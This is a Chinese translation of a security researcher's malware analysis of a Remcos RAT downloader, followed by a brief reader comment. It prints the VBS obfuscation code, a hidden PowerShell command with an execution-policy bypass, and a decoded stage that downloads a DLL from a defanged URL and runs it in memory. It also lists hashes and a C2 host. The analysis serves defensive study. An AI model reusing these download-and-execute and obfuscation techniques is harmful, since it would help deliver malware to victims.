带有 Unicode 混淆的 Remcos 下载器

吉沃运营专员

英文原文：https://isc.sans.edu/diary/29220

我发现了一个包含 VBS 脚本的恶意 RAR 存档，名为 "Unidad Justice citacion pendiente Fiscalia.rar"，用一个简单的 4 位密码保护以阻止自动扫描。在内部，VBS 脚本具有相同的名称。 两者都不为 VT 所知。

该文件具有愚蠢 (但仍然有效) 的技巧来污染代码，例如注释 (以单引号开头的行) 和标签 (以冒号结尾的行)。请注意，可以在一行中加入多个标签：

1. IzGPO:yWNxx:IOfaI:Cvghz:qfPU:aDHqa:LxWPC:ULLtt:YwPsT

复制代码

VBS 脚本对一些代码进行去混淆处理并启动 PowerShell 解释器，主要数据是 Base64 编码的，但 unicode 字符被注入：



同样，许多工具都无法正确处理非常简单 unicode 字符，尤其是在 Linux 上。如果尝试在 Linux shell 中显示脚本，将看不到有趣的代码！

可疑函数被混淆并通过其他函数调用，该脚本有多个保留字符串。"StrReverse" 是这样处理的：

1. Function BgkX(GGMtp)
   
2.   dim MDje
   
3.   MDje = "BgkX = "
   
4.   MDje = MDje + "SNdPZOtrNdPZORevNdPZOerse"
   
5.   MDje = BeWD(MDje,"NdPZO","")
   
6.   MDje = MDje + "(GGMtp)"
   
7.   execute(MDje)
   
8. End Function

复制代码

execute() 语句类似于 Javascript 中的 eval()，接受一个字符串参数并将其解释为 VBS 语句或语句序列

另一个混淆：



这是执行的 PowerShell 脚本 (美化)：

1. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command \
   
2. $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAI (payload removed) AA9ACAAJwA???ASwBhAGIAJwAgACkAKQA='; \
   
3. $OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('???','U') ) ); \
   
4. $OWjuxD = $OWjuxD.replace('??????????', 'C:\Users\user01\AppData\Local\Temp\Unidad judicial cita.vbs'); \
   
5. powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD

复制代码

下一个解码的 Base64 有效载荷 (也被垃圾字符污染) 是：

1. $RodaCopy = '–¯¯––¯––¯¯'; [Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('hxxps://tinyurl[.]com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('0/Ev3d1/d/ee.etsap//:sptth' , $RodaCopy , 'd3vEKab' ))

复制代码

从 hxxps://tinyurl[.]com/2erph6cs (SHA255:49562fda46cfa05b2a6e2cb06a5d25711c9a435b578a7ec375f928aae9c08ff2) 下载 DLL。 它已经在 VT 上，得分为 40/69[1]。 DLL 使用 AppDomain.Load 方法在当前进程中加载，并从反向 URL 启动 Remcos 示例 (SHA256: ee1e6615088a95b6d401603fc0f46b105a453eecbd8131305443983b6d32151f)。

C2 服务器是 deferos2.con-ip[.]com:2425。

几个月前我已经看到了这种感染技术，但它似乎仍然有效并且仍然在野外。 许多安全控件，尤其是在 Linux 上运行的安全控件，都存在正确处理 Unicide 字符的问题！

xulongzhuiyi

没看懂，太高深了